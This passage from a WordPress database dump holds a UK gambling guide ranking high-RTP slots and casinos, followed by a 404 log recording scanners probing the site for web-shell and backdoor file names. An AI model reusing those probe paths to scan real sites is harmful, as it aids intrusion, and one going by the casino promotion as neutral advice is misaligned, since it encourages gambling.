11:18:42','2026-07-17 11:18:42','<h1>Best Highest RTP Slots UK 2026: A Realistic Guide to Machines That Pay Back More</h1><p>Every year, players type \"highest RTP slots UK\" into Google and hope for a list that turns a tenner into a deposit on a house. Here is the thing: RTP is real, but it is also one of the most misunderstood numbers in gambling. You are not going to beat the casino. You are going to lose slower. That is the entire pitch.</p><p>This guide covers the slots that statistically return the most to UK players in 2026. We will name names, list real RTP figures, and point to the operators where you can actually play them. We will also explain why a \"99% RTP\" slot does not mean £99 back from every £100 you put in, and why volatility matters more than the headline number.</p><p>No affiliate fluff. No \"magic\" strategies. Just the cold arithmetic and a few places where the numbers are slightly less cold.</p><h2>What RTP Actually Means (And What It Doesn\'t)</h2><p>Return to Player is the percentage of total wagered money a slot is programmed to pay back over an enormous number of spins. A 98% RTP slot keeps £2 for every £100 wagered, on average, across millions of rounds. That £2 is the casino\'s theoretical margin. It is not a fee per spin. It is not a promise for your next hour.</p><p>Short sessions are chaotic. You can hit a bonus on spin three and cash out 150% of your stake, or you can feed a machine through 400 spins and get back 30%. That does not break the RTP; it is exactly how variance works. The RTP number only becomes meaningful over hundreds of thousands of spins, which no human player ever reaches.</p><p>Still, RTP is not a marketing trick. Higher RTP slots genuinely return more money to players in aggregate. The difference between 97% and 94% might sound tiny, but over a year of regular play it shifts thousands of pounds from your pocket to the operator\'s. That is why smart players in the UK filter by RTP first and worry about graphics later.</p>\n<a href=\"https://amb18b.com/?p=438\">Best iSoftBet Online Casinos UK 2026</a><h2>The Highest RTP Online Slots in the UK for 2026</h2><p>Below is a shortlist of the highest-RTP slot games available at UK-licensed casinos. RTP figures are based on the standard versions offered by the developers. Always check the game info screen when you load a title because some operators run lower-RTP variants.</p><table><thead><tr><th>Slot</th><th>Provider</th><th>RTP</th><th>Volatility</th></tr></thead><tbody><tr><td>Ugga Bugga</td><td>Playtech</td><td>99.07%</td><td>Low</td></tr><tr><td>Mega Joker</td><td>NetEnt</td><td>99.00%</td><td>Medium</td></tr><tr><td>Jackpot 6000</td><td>NetEnt</td><td>98.90%</td><td>Medium</td></tr><tr><td>1429 Uncharted Seas</td><td>Thunderkick</td><td>98.60%</td><td>Low/Medium</td></tr><tr><td>Blood Suckers</td><td>NetEnt</td><td>98.00%</td><td>Low</td></tr><tr><td>Starmania</td><td>NextGen</td><td>97.87%</td><td>Medium</td></tr><tr><td>White Rabbit Megaways</td><td>Big Time Gaming</td><td>97.72%</td><td>High</td></tr><tr><td>Big Bad Wolf</td><td>Quickspin</td><td>97.34%</td><td>Low/Medium</td></tr></tbody></table><p>You will notice most of these are not the shiny new releases. There is a reason. Developers release high-RTP games, watch players ignore them because the graphics look dated, and then quietly shift to lower-RTP versions of newer titles. The best paying slots in 2026 are often the ones that have been around for a decade or more.</p><p>Ugga Bugga tops the list, but it is a strange game. It uses a multi-spin hold mechanic from the early 2000s and looks like a spreadsheet with symbols. If you can tolerate the interface, it is the highest-RTP online slot you can legally play in the UK. Mega Joker and Jackpot 6000 are similar: classic fruit machines with supermeter modes that push the theoretical return above the usual ceiling.</p><h2>Where to Play High RTP Slots: UK Casino Comparison</h2><p>All slots above are available at multiple UK-licensed casinos. The table below lists operators that consistently offer the standard high-RTP versions. Bonus details change often, so the column below shows the bonus type rather than a stale number.</p><table><thead><tr><th>Casino / Operator</th><th>Bonus Type</th><th>UK Licence</th><th>Quick Note</th></tr></thead><tbody><tr><td>bet365 Casino</td><td>Welcome bonus</td><td>UKGC</td><td>Huge game library, reliable RTP versions</td></tr><tr><td>888casino</td><td>Welcome bonus</td><td>UKGC</td><td>Exclusive slots, long-standing reputation</td></tr><tr><td>LeoVegas</td><td>Deposit match + free spins</td><td>UKGC</td><td>Strong mobile platform</td></tr><tr><td>Casumo</td><td>Welcome bonus</td><td>UKGC</td><td>Adventure-style gamification</td></tr><tr><td>Mr Green</td><td>Welcome bonus</td><td>UKGC</td><td>Elegant interface, good RTP filters</td></tr><tr><td>PlayOJO</td><td>No-wagering free spins</td><td>UKGC</td><td>No wagering on bonuses</td></tr><tr><td>Grosvenor Casinos</td><td>Welcome bonus</td><td>UKGC</td><td>Land-based and online, trusted brand</td></tr><tr><td>Betway Casino</td><td>Welcome bonus</td><td>UKGC</td><td>Wide range of high RTP slots</td></tr><tr><td>Sky Vegas</td><td>Free spins</td><td>UKGC</td><td>Simple, no-nonsense games</td></tr><tr><td>Virgin Games</td><td>Welcome bonus</td><td>UKGC</td><td>Good for casual players</td></tr></tbody></table><p>That \"welcome bonus\" is not a gift. It is a retention tool with terms attached, and the casino always designs those terms to keep you playing. Read the wagering requirements before you claim anything. A bonus that forces you to wager £1,000 to unlock £10 of winnings is not doing you any favours.</p><p>PlayOJO stands out because it advertises no-wagering free spins, which at least removes the worst trick. The other brands on this list are solid and fully licensed, but always check the specific slot\'s RTP version before you commit real money.</p>\n<p class=\"dcm-resource-link\"><a href=\"https://rougecasinoguide.com/\">rougecasinoguide.com</a></p>\n<h2>High RTP Low Volatility Slots: The Slow Leak Strategy</h2><p>Some players think high RTP automatically means low volatility. Not true. White Rabbit Megaways has a high RTP but can drain a balance fast because wins cluster in rare bonus rounds. If you want the highest RTP combined with the lowest volatility, you need a different shortlist.</p><p>Low volatility slots pay small amounts frequently. They do not build massive jackpots, but they keep your balance alive longer. Ugga Bugga, Blood Suckers, and Big Bad Wolf are classic examples. You will rarely see a screen full of wilds, but you will see regular returns that cushion the session.</p><p>For UK players who treat slots as entertainment rather than a get-rich scheme, low volatility high RTP slots are the most rational choice. You accept that the casino edge still exists, but you stretch your bankroll and reduce the chance of a brutal wipeout in ten minutes.</p><h2>Provider Focus: The Studios Behind the Highest RTP Slots</h2><p>Not all game providers are equal when it comes to generosity. Some studios have built reputations for publishing high-RTP versions, while others quietly push the industry average down to 95% or lower.</p>\n<a href=\"https://amb18b.com/?p=435\">Best Instant Withdrawal Casinos UK 2026: Cash Out Without the Wait</a><h3>NetEnt</h3><p>NetEnt gave us Mega Joker, Jackpot 6000, and Blood Suckers. Those three are still among the highest RTP slots in the UK. The company has shifted toward lower RTP in recent years, but the older catalogue remains a goldmine for value players. If you see a NetEnt slot with \"Supermeter\" in the rules, check the RTP—it is often above 98%.</p><h3>Playtech</h3><p>Playtech owns Ugga Bugga, the top RTP slot available to UK players. The company is not known for consistency; some Playtech slots sit at 94% while others climb above 99%. The lesson: never assume a provider\'s average. Always check the individual game.</p><h3>Thunderkick</h3><p>Thunderkick\'s 1429 Uncharted Seas is a rare combination of beautiful design and high RTP. It sits at 98.6% and offers a relaxed, low-volatility experience. Thunderkick is a smaller studio, but it has kept RTPs honest on several titles.</p><h3>Big Time Gaming</h3><p>Big Time Gaming invented Megaways. White Rabbit Megaways sits at 97.72%, which is excellent for a high-volatility game. BTG often publishes the RTP prominently, which is a good sign. If a provider hides the RTP, treat that as a red flag.</p><h2>RTP vs Volatility: What Actually Decides Your Session</h2><p>RTP tells you the long-term return. Volatility tells you how that return is distributed. A 99% RTP slot with high volatility can still give you twenty dead spins in a row, then a bonus that pays 80x your stake. A 95% RTP slot with low volatility may never give you a big win, but it will drip small returns constantly.</p><p>For most UK players, volatility matters more than RTP in a short session. That is why a \"best slots\" list based solely on RTP can be misleading. The ideal slot depends on what you want: longevity or a shot at a big payout. If you want both, you need a unicorn—White Rabbit Megaways comes close, but it will still test your patience.</p><p>The pragmatic approach is to pick high RTP, then choose the volatility that matches your bankroll and temperament. If you have £50 and two hours, low volatility high RTP slots will keep you alive. If you have £500 and are chasing a jackpot, high volatility might be acceptable, but the casino\'s edge is still working against you.</p><h2>How We Selected the Best High RTP Slots</h2><p>This list is not a random scrape of \"highest RTP\" forum posts. We applied a simple method:</p><ul><li>Only slots available at UKGC-licensed casinos in 2026.</li><li>Only standard versions with verified RTP from the game\'s official paytable or provider documentation.</li><li>Minimum RTP threshold of 97%, with preference for slots above 98% where available.</li><li>Excluded slots that are restricted in the UK or available only in demo mode.</li><li>Checked volatility classification from provider data and player reports.</li></ul><p>We did not invent numbers. Every RTP figure in the table above is published by the game developer. If a casino runs a lower-RTP version of the same slot, that is on the operator, not the provider. Always verify in the game information panel before you play.</p><h2>UK Gambling Law in 2026: What Has Changed for Online Slots</h2><p>The UK Gambling Commission remains the regulator for all online casinos offering slots to British players. Over the past few years, the government has tightened rules. Maximum stakes for online slots are now capped for most players, and affordability checks have become more common. This does not change RTP directly, but it affects how casinos structure promotions.</p><p>In 2026, expect tighter verification requirements, slower withdrawals on large amounts, and more tools for self-exclusion. These changes are meant to reduce harm. They also make the \"VIP\" promises from older adverts look even more hollow. A casino that calls you a VIP is just running a retention algorithm.</p><p>All operators in our comparison table hold an active UKGC licence. Playing at unlicensed offshore sites is not only risky; it is often impossible from a UK IP address. Stick to the licensed brands and you at least have a regulatory framework if something goes wrong.</p><h2>Quick Answers to Real Questions</h2><p>Short, direct answers to the questions players actually ask about high RTP slots in the UK.</p><h3>Which slot has the highest RTP in the UK?</h3><p>Ugga Bugga by Playtech holds the top spot at 99.07% RTP. It is an old, low-volatility slot with a primitive layout. Do not expect cinematic graphics; do expect a slow grind.</p><h3>What does RTP really mean for a single session?</h3><p>RTP is a long-term average across millions of spins. In one session, you might get 40% back or 300% back. The number describes the machine\'s theoretical return over years, not your next ten minutes.</p><h3>Are high RTP slots only for high rollers?</h3><p>No. Many high RTP slots allow minimum stakes from £0.10 or £0.20. The RTP percentage applies regardless of bet size. High rollers might prefer high volatility slots with bigger potential, but RTP is independent of stake.</p><h3>Can I find high RTP slots at mobile casinos?</h3><p>Yes, every UK casino we listed offers mobile play. The RTP is set by the game provider and does not change between desktop and mobile. Check the game info screen to verify the version\'s RTP.</p><h3>Do online casinos change RTP for UK players?</h3><p>Some operators offer different RTP versions of the same slot. UK-facing sites usually run the standard version, but always check the game\'s help file. If a slot shows 94% when the original is 97%, you are on a low-RTP version.</p><h3>Are high RTP slots guaranteed to pay more in 2026?</h3><p>No. RTP is a long-term theoretical return, not a guarantee for any single session. A high RTP slot will return more to players collectively, but your individual results depend on luck and variance.</p><p>That\'s the honest picture. The highest RTP slots in the UK are available, legal, and worth your time if you want to minimise the house edge. Just remember: the \"free\" spins and \"VIP\" perks are not charity. Casinos are businesses, and the maths always favours them. Play for entertainment, set limits, and never chase a loss.</p>','Best Highest RTP Slots UK 2026: A Realistic Guide to Machines That Pay Back More','','publish','closed','closed','','best-highest-rtp-slots-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(443,3,'2026-09-03 15:06:35','0000-00-00 00:00:00','','Auto Draft','','auto-draft','','','','','','','2026-09-03 15:06:35','0000-00-00 00:00:00','',0,'https://amb18b.com/?p=443',0,'post','',0);
/*!40000 ALTER TABLE `IwGJ28BV_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_redirects_404`
--
DROP TABLE IF EXISTS `IwGJ28BV_redirects_404`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_redirects_404` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`url` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`ip_address` varchar(45) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`referrer` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
`count` int NOT NULL DEFAULT '1',
`last_redirected` datetime NOT NULL,
`created_at` timestamp NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (`id`),
KEY `url_hash` (`url`(191)),
KEY `idx_ip_address` (`ip_address`),
KEY `idx_last_redirected` (`last_redirected`),
KEY `idx_created_at` (`created_at`)
) ENGINE=InnoDB AUTO_INCREMENT=104948 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_redirects_404`
--
LOCK TABLES `IwGJ28BV_redirects_404` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_redirects_404` DISABLE KEYS */;
INSERT INTO `IwGJ28BV_redirects_404` VALUES (1,'https://amb18b.com/.well-known/acme-challenge/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:12','2025-10-22 09:18:12'),(2,'https://amb18b.com/abcd.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:14','2025-10-22 09:18:14'),(3,'https://amb18b.com/about.php?p=','52.176.88.217','Direct Access',1,'2025-10-22 09:18:16','2025-10-22 09:18:16'),(4,'https://amb18b.com/chosen.php?p=','52.176.88.217','Direct Access',1,'2025-10-22 09:18:18','2025-10-22 09:18:18'),(5,'https://amb18b.com/default.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:19','2025-10-22 09:18:19'),(6,'https://amb18b.com/ds.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:21','2025-10-22 09:18:21'),(7,'https://amb18b.com/f5.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:22','2025-10-22 09:18:22'),(8,'https://amb18b.com/file.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:24','2025-10-22 09:18:24'),(9,'https://amb18b.com/god4m.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:25','2025-10-22 09:18:25'),(10,'https://amb18b.com/info.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:26','2025-10-22 09:18:26'),(11,'https://amb18b.com/modules/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:28','2025-10-22 09:18:28'),(12,'https://amb18b.com/test1.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:29','2025-10-22 09:18:29'),(13,'https://amb18b.com/uploads/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:31','2025-10-22 09:18:31'),(14,'https://amb18b.com/wp-admin/images/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:32','2025-10-22 09:18:32'),(15,'https://amb18b.com/wp-good.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:35','2025-10-22 09:18:35'),(16,'https://amb18b.com/wp-includes/ID3/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:36','2025-10-22 09:18:36'),(17,'https://amb18b.com/wp-includes/Text/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:38','2025-10-22 09:18:38'),(18,'https://amb18b.com/wp-includes/assets/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:39','2025-10-22 09:18:39'),(19,'https://amb18b.com/wp-includes/js/codemirror/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:41','2025-10-22 09:18:41'),(20,'https://amb18b.com/wp-includes/js/crop/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:42','2025-10-22 09:18:42'),(21,'https://amb18b.com/wp-includes/pomo/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:43','2025-10-22 09:18:43'),(22,'https://amb18b.com/wp-includes/rest-api/fields/','52.176.88.217','Direct Access',1,'2025-10-22 09:18:45','2025-10-22 09:18:45'),(23,'https://amb18b.com/.__info.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:47','2025-10-22 09:18:47'),(24,'https://amb18b.com/0.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:48','2025-10-22 09:18:48'),(25,'https://amb18b.com/07.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:49','2025-10-22 09:18:49'),(26,'https://amb18b.com/1.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:51','2025-10-22 09:18:51'),(27,'https://amb18b.com/123.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:52','2025-10-22 09:18:52'),(28,'https://amb18b.com/aa.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:54','2025-10-22 09:18:54'),(29,'https://amb18b.com/about.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:55','2025-10-22 09:18:55'),(30,'https://amb18b.com/admin.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:57','2025-10-22 09:18:57'),(31,'https://amb18b.com/adminfuns.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:58','2025-10-22 09:18:58'),(32,'https://amb18b.com/akc.php','52.176.88.217','Direct Access',1,'2025-10-22 09:18:59','2025-10-22 09:18:59'),(33,'https://amb18b.com/akcc.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:01','2025-10-22 09:19:01'),(34,'https://amb18b.com/asasx.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:02','2025-10-22 09:19:02'),(35,'https://amb18b.com/asd.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:04','2025-10-22 09:19:04'),(36,'https://amb18b.com/atomlib.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:05','2025-10-22 09:19:05'),(37,'https://amb18b.com/autoload_classmap.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:06','2025-10-22 09:19:06'),(38,'https://amb18b.com/axx.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:08','2025-10-22 09:19:08'),(39,'https://amb18b.com/berax.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:09','2025-10-22 09:19:09'),(40,'https://amb18b.com/build.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:11','2025-10-22 09:19:11'),(41,'https://amb18b.com/buy.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:12','2025-10-22 09:19:12'),(42,'https://amb18b.com/checkbox.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:13','2025-10-22 09:19:13'),(43,'https://amb18b.com/chosen.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:15','2025-10-22 09:19:15'),(44,'https://amb18b.com/classwithtostring.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:17','2025-10-22 09:19:17'),(45,'https://amb18b.com/cong.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:18','2025-10-22 09:19:18'),(46,'https://amb18b.com/css.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:19','2025-10-22 09:19:19'),(47,'https://amb18b.com/dropdown.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:21','2025-10-22 09:19:21'),(48,'https://amb18b.com/edit.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:22','2025-10-22 09:19:22'),(49,'https://amb18b.com/file2.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:24','2025-10-22 09:19:24'),(50,'https://amb18b.com/file4.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:25','2025-10-22 09:19:25'),(51,'https://amb18b.com/filemanager.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:26','2025-10-22 09:19:26'),(52,'https://amb18b.com/flower.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:28','2025-10-22 09:19:28'),(53,'https://amb18b.com/form.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:29','2025-10-22 09:19:29'),(54,'https://amb18b.com/gecko.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:31','2025-10-22 09:19:31'),(55,'https://amb18b.com/kyami.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:32','2025-10-22 09:19:32'),(56,'https://amb18b.com/makeasmtp.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:33','2025-10-22 09:19:33'),(57,'https://amb18b.com/manager.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:35','2025-10-22 09:19:35'),(58,'https://amb18b.com/mari.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:36','2025-10-22 09:19:36'),(59,'https://amb18b.com/moon.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:38','2025-10-22 09:19:38'),(60,'https://amb18b.com/nc4.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:39','2025-10-22 09:19:39'),(61,'https://amb18b.com/new.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:41','2025-10-22 09:19:41'),(62,'https://amb18b.com/wp-admin.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:44','2025-10-22 09:19:44'),(63,'https://amb18b.com/wp-trackback.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:45','2025-10-22 09:19:45'),(64,'https://amb18b.com/xmrlpc.php','52.176.88.217','Direct Access',1,'2025-10-22 09:19:47','2025-10-22 09:19:47'),(65,'https://amb18b.com/?author=2','3.75.88.88','Direct Access',1,'2025-10-22 09:28:26','2025-10-22 09:28:26'),(66,'https://amb18b.com/?author=3','3.75.88.88','Direct Access',1,'2025-10-22 09:28:26','2025-10-22 09:28:26'),(67,'https://amb18b.com/mgbline.com','45.8.17.97','https://amb18b.com/?post_type=elementor_library&p=32&elementor-preview=32&ver=1761125332',1,'2025-10-22 09:34:36','2025-10-22 09:34:36'),(68,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.66.34.55','Direct Access',1,'2025-10-22 10:07:59','2025-10-22 10:07:59'),(69,'https://amb18b.com//?author=2','34.66.34.55','Direct Access',1,'2025-10-22 10:08:01','2025-10-22 10:08:01'),(70,'https://amb18b.com/app/','34.1.23.71','Direct Access',2,'2025-10-22 10:15:55','2025-10-22 10:15:27'),(71,'https://amb18b.com/login/','34.1.23.71','Direct Access',2,'2025-10-22 10:15:57','2025-10-22 10:15:29'),(72,'https://amb18b.com/error.php','74.226.158.222','Direct Access',1,'2025-10-22 10:31:56','2025-10-22 10:31:56'),(73,'https://amb18b.com/wpo.php','74.226.158.222','Direct Access',2,'2025-10-22 10:32:51','2025-10-22 10:31:57'),(74,'https://amb18b.com/shellalfa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:31:58','2025-10-22 10:31:58'),(75,'https://amb18b.com/As.php','74.226.158.222','Direct Access',1,'2025-10-22 10:31:59','2025-10-22 10:31:59'),(76,'https://amb18b.com/owl.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:00','2025-10-22 10:32:00'),(77,'https://amb18b.com/php8.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:01','2025-10-22 10:32:01'),(78,'https://amb18b.com/wp-admin/maint/index.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:02','2025-10-22 10:32:02'),(79,'https://amb18b.com/n.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:03','2025-10-22 10:32:03'),(80,'https://amb18b.com/s.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:04','2025-10-22 10:32:04'),(81,'https://amb18b.com/cong.php?p=','74.226.158.222','Direct Access',1,'2025-10-22 10:32:05','2025-10-22 10:32:05'),(82,'https://amb18b.com/wp-includes/fonts/about.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:06','2025-10-22 10:32:06'),(83,'https://amb18b.com/css.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:07','2025-10-22 10:32:07'),(84,'https://amb18b.com/lv.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:08','2025-10-22 10:32:08'),(85,'https://amb18b.com/ee.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:09','2025-10-22 10:32:09'),(86,'https://amb18b.com/6.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:10','2025-10-22 10:32:10'),(87,'https://amb18b.com/system_log.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:11','2025-10-22 10:32:11'),(88,'https://amb18b.com/ab.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:12','2025-10-22 10:32:12'),(89,'https://amb18b.com/lock360.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:13','2025-10-22 10:32:13'),(90,'https://amb18b.com/about.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:14','2025-10-22 10:32:14'),(91,'https://amb18b.com/222.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:15','2025-10-22 10:32:15'),(92,'https://amb18b.com/abcd.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:16','2025-10-22 10:32:16'),(93,'https://amb18b.com/gifclass.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:18','2025-10-22 10:32:18'),(94,'https://amb18b.com/enclas.php','74.226.158.222','Direct Access',2,'2025-10-22 10:32:53','2025-10-22 10:32:19'),(95,'https://amb18b.com/alfa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:20','2025-10-22 10:32:20'),(96,'https://amb18b.com/we.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:21','2025-10-22 10:32:21'),(97,'https://amb18b.com/fe5.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:22','2025-10-22 10:32:22'),(98,'https://amb18b.com/tgrs.php','74.226.158.222','Direct Access',2,'2025-10-22 10:32:40','2025-10-22 10:32:23'),(99,'https://amb18b.com/ut.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:24','2025-10-22 10:32:24'),(100,'https://amb18b.com/a3.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:25','2025-10-22 10:32:25'),(101,'https://amb18b.com/aa.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:26','2025-10-22 10:32:26'),(102,'https://amb18b.com/.well-known/acme-challenge/about.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:27','2025-10-22 10:32:27'),(103,'https://amb18b.com/3.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:28','2025-10-22 10:32:28'),(104,'https://amb18b.com/f6.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:29','2025-10-22 10:32:29'),(105,'https://amb18b.com/fm.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:30','2025-10-22 10:32:30'),(106,'https://amb18b.com/rrr.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:31','2025-10-22 10:32:31'),(107,'https://amb18b.com/usep.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:32','2025-10-22 10:32:32'),(108,'https://amb18b.com/fm.php?p=','74.226.158.222','Direct Access',1,'2025-10-22 10:32:33','2025-10-22 10:32:33'),(109,'https://amb18b.com/0x.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:34','2025-10-22 10:32:34'),(110,'https://amb18b.com/goat.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:35','2025-10-22 10:32:35'),(111,'https://amb18b.com/123.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:36','2025-10-22 10:32:36'),(112,'https://amb18b.com/ioxi-o.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:38','2025-10-22 10:32:38'),(113,'https://amb18b.com/taktak.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:39','2025-10-22 10:32:39'),(114,'https://amb18b.com/gt.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:41','2025-10-22 10:32:41'),(115,'https://amb18b.com/aghbvr.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:42','2025-10-22 10:32:42'),(116,'https://amb18b.com/miso.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:44','2025-10-22 10:32:44'),(117,'https://amb18b.com/naxc.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:45','2025-10-22 10:32:45'),(118,'https://amb18b.com/fex.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:46','2025-10-22 10:32:46'),(119,'https://amb18b.com/taff.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:47','2025-10-22 10:32:47'),(120,'https://amb18b.com/bless11.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:48','2025-10-22 10:32:48'),(121,'https://amb18b.com/aj.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:49','2025-10-22 10:32:49'),(122,'https://amb18b.com/opts.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:50','2025-10-22 10:32:50'),(123,'https://amb18b.com/filer.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:52','2025-10-22 10:32:52'),(124,'https://amb18b.com/en0.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:54','2025-10-22 10:32:54'),(125,'https://amb18b.com/kaza.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:56','2025-10-22 10:32:56'),(126,'https://amb18b.com/wsd.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:57','2025-10-22 10:32:57'),(127,'https://amb18b.com/gifclass4.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:58','2025-10-22 10:32:58'),(128,'https://amb18b.com/info.php','74.226.158.222','Direct Access',1,'2025-10-22 10:32:59','2025-10-22 10:32:59'),(129,'https://amb18b.com/333.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:00','2025-10-22 10:33:00'),(130,'https://amb18b.com/cfile.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:01','2025-10-22 10:33:01'),(131,'https://amb18b.com/bless3.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:02','2025-10-22 10:33:02'),(132,'https://amb18b.com/bless.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:04','2025-10-22 10:33:04'),(133,'https://amb18b.com/doti.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:05','2025-10-22 10:33:05'),(134,'https://amb18b.com/031.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:06','2025-10-22 10:33:06'),(135,'https://amb18b.com/wfile.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:07','2025-10-22 10:33:07'),(136,'https://amb18b.com/lala.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:08','2025-10-22 10:33:08'),(137,'https://amb18b.com/gmo.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:09','2025-10-22 10:33:09'),(138,'https://amb18b.com/he.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:10','2025-10-22 10:33:10'),(139,'https://amb18b.com/plss3.php','74.226.158.222','Direct Access',1,'2025-10-22 10:33:11','2025-10-22 10:33:11'),(140,'https://amb18b.com/ton.php','74.226.158.222','Direct 